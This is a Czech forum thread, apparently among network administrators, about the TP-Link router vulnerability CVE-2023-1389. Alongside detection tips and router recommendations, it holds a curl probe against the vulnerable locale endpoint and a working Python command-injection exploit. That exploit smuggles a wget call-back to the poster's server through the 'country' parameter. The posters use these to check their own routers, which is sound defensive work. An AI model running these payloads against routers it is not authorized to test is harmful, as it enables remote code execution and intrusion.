Zranitelnost v routerech TP-Link (CVE-2023-1389)

Zatím stačí podle MAC adresy identifikovat, že je to TP-Link, podle všeho jsou ale alespoň proti tomuto CVE bezpečné jen opravdu staré modely jako WR543G, ale těch už je velmi málo. Každý výrobce má jednou za čas nějaký průser, tentokrát to holt prasklo na TP-Link. Za ty peníze jsou ty routery dobré až až, hlavně pokud výrobce v rozumné době opraví tuto megadíru.

curl -k -d @curl.payload -X POST "https://$1/cgi-bin/luci/;stok=/locale?form=country" -A "python-requests/2.21.0" -H 'Content-Type:' -H "Accept-Encoding: gzip, deflate" -H "Connection: keep-alive"

U těch které jsme měli napadené curl vrátí:
{"data":""}

Ale teda nepodařilo se mi spustit vlastní kód.

Detekce jde dělat podle počtu spojení. A u nás (ale tohle se asi může lišit) všechny útoky jdou z SRC PORT 80. Tím se celkem jednoduše z netflow uděla TOP statistika na základě SRC IP.

jihi U těch které jsme měli napadené curl vrátí:

A u nenapadených to prosím vrátí co, ať vím, že ten test proběhl správně?

gemb Tahle diskuze je věčná. To je sakra takový problém lidem vysvětlit, že k mobilům za 20k a notebookům za dalších 20k je prostě totální kravina pořizovat čínský krám za tisícovku? 100 Eur za Unifi prostě velký problém být nemůže, lepší jednou za 5-10 let koupit Unifi než kupovat každé 2-3 roky nový levný krám. 99% lidí kterým jsem tohle vysvětlil už ta cena Unifi nepřišla nijak strašná. Nejsme tak bohatí, abychom si mohli dovolit kupovat levné věci.
Já dávám do nenáročných domácností posledních několik let lepší ASUSy (dřív RT-AC66U/RT-AC68U, teď RT-AX56U/RT-AX58U aj. ) a musím zaklepat, problémy s tím prostě žádné nejsou. Wifi funguje parádně, SW podpora super (používám Merlin a jednou za čas všechny routery postupně aktualizuji), má to bezvadně fungující VPN (jak OpenVPN tak už teď i Wireguard), ani jednou jsem nemusel řešit napadnutí, a to jsou mnohé na veřejkách. Lze tam i dobře nastavit VPN klienty s policy routingem, abych mohl mít sítě za nimi přístupné z centrálního místa i tam kde jsou routery za NATem.
Do byť jen trochu náročnějších domácností a malých firem mám léty ověřenou kombinaci pfSense boxu + Unifi, to funguje parádně.

jnikles
podle toho co jsem vysledoval, tak update FW opravdu ničemu nepomůže, ovšem napadeny jsou podle všeho jen routery, které mají remote control IP adresu neomezenou. Ty, které mají specifickou IP zatím vypadají útokem nezasaženy.

import requests, urllib.parse, argparse
parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-id", "--id", dest = "id", default = "1234", help="id for callback")

args = parser.parse_args()

revshell = urllib.parse.quote("wget http://MUJ.WEB/index.php?clbk=" + args.id);
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"


r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)

Tohle je ještě kus pythonu vybrakovany odsud https://www.exploit-db.com/exploits/51677
Tohle mi už spouští kód na AX23,20 a 50
Mám tam zadaný wget na vlastní web kde si loguji přístupy dle toho "id" ktere se zadava. Asi dobrý postup je pustit ten curl na všechny IP a ty kde vrati ten string "data" ještě prozkoumat tímto pythonem.
Odhaduju, že útok na C6ky bude trochu jiný, ale dle chování myslím, že je také přes mng. vystavený do internetu.